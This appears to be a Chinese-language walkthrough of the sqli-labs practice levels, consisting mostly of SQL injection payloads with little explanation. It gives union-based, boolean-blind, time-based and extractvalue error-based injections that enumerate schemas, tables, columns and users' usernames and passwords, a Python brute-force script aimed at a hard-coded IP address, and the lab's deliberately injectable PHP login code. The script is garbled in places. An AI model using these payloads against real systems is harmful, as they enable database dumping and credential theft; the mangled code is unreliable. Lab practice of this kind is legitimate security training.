?id=-1’ union select 1,(select group_concat(schema_name) from information_schema.schemata),3 –+
数据库爆出来了,爆表名
?id=-1’ union select 1,(select group_concat(table_name) from information_schema.columns where table_schema=”security”),3 –+
表名出来了,爆字段
?id=-1’ union select 1,(select group_concat(column_name) from information_schema.columns where table_name=”users”),3 –+
需要的数据都有了,咱可以直接把库给脱下来了
Less-2 - Less-4
这几题都一样,无非是注入点周围包裹的东西不一样,不多赘述,过。
Less-5 | 布尔盲注
?id=1
眉清目秀,啥都木有。
?id=1”‘ 一通测试下来,发现有了报错信息
如何利用报错信息注入呢?
?id=1’ and 1 = 1 –+ i
?id=2’ and 2 = 1 –+
那有意思的就来了,嘻嘻
1 2 3 4 5 6 7 8
mysql> select ((substr(group_concat((select group_concat(schema_name) from information_schema.schemata)),1,1))=0); +-----------------------------------------------------------------------------------------------------+ | ((substr(group_concat((select group_concat(schema_name) from information_schema.schemata)),1,1))=0) | +-----------------------------------------------------------------------------------------------------+ | 1 | +-----------------------------------------------------------------------------------------------------+ 1 row in set (0.00 sec)
爆数据库
1 2 3 4 5 6 7 8 9 10 11 12 13 14
import requests
url = "http://39.104.82.167/Less-5/?id=" res = ""
for i inrange(0,256): for j inrange(0,256): for k inrange(0,256): payload = f"1' and ascii(substr((select group_concat(schema_name) from information_schema.schemata),{j},1)) = {k} --+" r = requests.get(url+payload) if"You are in..........."in r.text: res += chr(k) print(res) break
更改payload来爆表
1
payload = f"1' and ascii(substr((select group_concat(table_name) from information_schema.columns where table_schema=\"security\"),{j},1)) = {k} --+"
更改payload 来爆字段
1
payload = f"1' and ascii(substr((select group_concat(column_name) from information_schema.columns where table_name="users"),{j},1)) = {k} --+"
?id=1’and if(length((select group_concat(table_name) from information_schema.tables where table_schema=database()))>13,sleep(5),1)–+
判断所有表名长度
?id=1’and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))>99,sleep(5),1)–+
逐一判断表名
?id=1’and if(length((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=’users’))>20,sleep(5),1)–+
判断所有字段名的长度
?id=1’and if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=’users’),1,1))>99,sleep(5),1)–+
逐一判断字段名。
?id=1’ and if(length((select group_concat(username,password) from users))>109,sleep(5),1)–+
判断字段内容长度
?id=1’ and if(ascii(substr((select group_concat(username,password) from users),1,1))>50,sleep(5),1)–+
<?php //including the Mysql connect parameters. include("../sql-connections/sql-connect.php"); error_reporting(0);
// take the variables if(isset($_POST['uname']) && isset($_POST['passwd'])) { $uname=$_POST['uname']; $passwd=$_POST['passwd'];
//logging the connection parameters to a file for analysis. $fp=fopen('result.txt','a'); fwrite($fp,'User Name:'.$uname); fwrite($fp,'Password:'.$passwd."\n"); fclose($fp);
// connectivity @$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1"; $result=mysql_query($sql); //注意这里 $row = mysql_fetch_array($result);
// Stripslashes if magic quotes enabled if (get_magic_quotes_gpc()) { $value = stripslashes($value); }
// Quote if not a number if (!ctype_digit($value)) { $value = "'" . mysql_real_escape_string($value) . "'"; } else { $value = intval($value); } return$value; }
// take the variables if(isset($_POST['uname']) && isset($_POST['passwd']))
{ //making sure uname is not injectable $uname=check_input($_POST['uname']);
$passwd=$_POST['passwd'];
//logging the connection parameters to a file for analysis. $fp=fopen('result.txt','a'); fwrite($fp,'User Name:'.$uname."\n"); fwrite($fp,'New Password:'.$passwd."\n"); fclose($fp);
// connectivity @$sql="SELECT username, password FROM users WHERE username= $uname LIMIT 0,1";
$result=mysql_query($sql); $row = mysql_fetch_array($result); //echo $row; if($row) { //echo '<font color= "#0000ff">'; $row1 = $row['username']; //echo 'Your Login name:'. $row1; $update="UPDATE users SET password = '$passwd' WHERE username='$row1'"; mysql_query($update); echo"<br>"; if (mysql_error()) { echo'<font color= "#FFFF00" font size = 3 >'; print_r(mysql_error()); echo"</br></br>"; echo"</font>"; } else { echo'<font color= "#FFFF00" font size = 3 >'; //echo " You password has been successfully updated " ; echo"<br>"; echo"</font>"; } echo'<img src="../images/flag1.jpg" />'; //echo 'Your Password:' .$row['password']; echo"</font>";
} else { echo'<font size="4.5" color="#FFFF00">'; //echo "Bug off you Silly Dumb hacker"; echo"</br>"; echo'<img src="../images/slap1.jpg" />'; echo"</font>"; } }
1’ and (extractvalue(1,concat(0x5c,version(),0x5c)))# 爆版本
1’ and (extractvalue(1,concat(0x5c,database(),0x5c)))# 爆数据库
1’ and (extractvalue(1,concat(0x5c,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x5c)))# 爆表名
1’ and (extractvalue(1,concat(0x5c,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=’users’),0x5c)))# 爆字段名
1’ and (extractvalue(1,concat(0x5c,(select password from (select password from users where username=’admin1’) b) ,0x5c)))# 爆字段内容该格式针对mysql数据库。
1’ and (extractvalue(1,concat(0x5c,(select group_concat(username,password) from users),0x5c)))# 爆字段内容。